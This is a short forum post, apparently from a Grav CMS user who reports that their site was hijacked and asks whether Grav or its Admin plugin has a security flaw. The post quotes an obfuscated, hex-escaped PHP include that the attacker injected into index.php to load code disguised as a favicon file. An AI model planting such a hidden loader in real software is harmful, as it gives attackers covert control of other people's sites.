Grav itself or Admin plugin has security issues?

Today i’ve noticed, that someone hijacked my Grav site on a VPS (none of other sites was affected, just Grav). I found they’ve added this code to my root index.php:


@include "\x2fs\x72v\x2fw\x77w\x2fs\x65r\x6be\x6fr\x67/\x2fn\x6fd\x65_\x6do\x64u\x6ce\x73/\x70a\x74h\x2dr\x6fo\x74-\x72e\x67e\x78/\x66a\x76i\x63o\x6e_\x63e\x615\x656\x2ei\x63o";


How is that possible? I’ve set correct permissions on files and dirs. Admin plugin has its flaws?

Discussion on Github here

What plugins did you have installed in Admin?